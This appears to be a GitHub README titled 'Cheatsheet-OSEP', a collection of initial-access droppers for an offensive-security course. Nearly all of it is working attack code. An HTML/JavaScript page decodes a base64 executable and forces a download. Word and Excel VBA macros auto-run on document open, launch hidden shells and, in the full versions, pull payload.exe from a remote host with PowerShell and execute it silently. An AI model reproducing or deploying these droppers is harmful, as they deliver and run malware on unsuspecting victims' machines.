Jordan ERNST
543c02c64c
|
||
|---|---|---|
| examples | ||
| README.md | ||
README.md
Cheatsheet-OSEP
Droppers
HTML
This saves the executable in Downloads (if user allows).
Encode your payload with base64 payload.exe -w 0 | kitty +kitten clipboard and replace it.
Adapt fileName if needed.
Works as expected in:
- Chrome
- Edge
- Internet Explorer
<html>
<body>
<script>
function base64ToArrayBuffer(base64) {
var binary_string = window.atob(base64);
var len = binary_string.length;
var bytes = new Uint8Array(len);
for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
return bytes.buffer;
}
/* base64 demon.x64.exe -w 0 | kitty +kitten clipboard */
var fileName = 'msfstaged.exe';
console.log('START');
var file = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAA...';
var data = base64ToArrayBuffer(file);
var blob = new Blob([data], { type: 'octet/stream' });
console.log('Before Elem');
if (window.navigator.msSaveBlob) {
// IE/Edge
console.log('Edge/Internet Explorer');
window.navigator.msSaveBlob(blob, fileName);
}
else {
console.log('Chrome/Firefox or others');
var a = document.createElement('a');
document.body.appendChild(a);
a.style = 'display: none';
var url = window.URL.createObjectURL(blob);
a.href = url;
a.download = fileName;
a.click();
window.URL.revokeObjectURL(url);
}
console.log('END');
</script>
</body>
</html>
Office
Word
Basic example
.docx doesn't support embedding macros, save as .doc or docm.
Shell method:
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "cmd.exe"
Shell str, vbHide
End Sub
Windows Script Host method:
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "cmd.exe"
CreateObject("Wscript.Shell").Run str, 0
End Sub
Full dropper and execution
Shell method:
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', 'payload.exe')"
Shell str, vbHide
Dim exePath As String
exePath = ActiveDocument.Path + "\payload.exe"
Sleep (6)
Shell exePath, vbHide
End Sub
Sub Sleep(n As Long)
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End Sub
Windows Script Host method:
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', 'payload.exe')"
CreateObject("Wscript.Shell").Run str, 0
Dim exePath As String
exePath = ActiveDocument.Path + "\payload.exe"
Sleep (6)
CreateObject("Wscript.Shell").Run exePath, 0
End Sub
Sub Sleep(n As Long)
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End Sub
Excel
Basic example
Shell method:
Sub Workbook_Open()
MyMacro
End Sub
Sub Auto_Open()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "cmd.exe"
Shell str, vbHide
End Sub
Windows Script Host method:
Sub Workbook_Open()
MyMacro
End Sub
Sub Auto_Open()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "cmd.exe"
CreateObject("Wscript.Shell").Run str, 0
End Sub
Full dropper and execution
Shell method:
Sub Workbook_Open()
MyMacro
End Sub
Sub Auto_Open()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', 'C:\Windows\Temp\payload.exe')"
Shell str, vbHide
Dim exePath As String
exePath = "C:\Windows\Temp\payload.exe"
Sleep (6)
Shell exePath, vbHide
End Sub
Sub Sleep(n As Long)
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End Sub
Windows Script Host method:
Sub Workbook_Open()
MyMacro
End Sub
Sub Auto_Open()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.120/payload.exe', 'C:\Windows\Temp\payload.exe')"
CreateObject("Wscript.Shell").Run str, 0
Dim exePath As String
exePath = "C:\Windows\Temp\payload.exe"
Sleep (6)
CreateObject("Wscript.Shell").Run exePath, 0
End Sub
Sub Sleep(n As Long)
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End Sub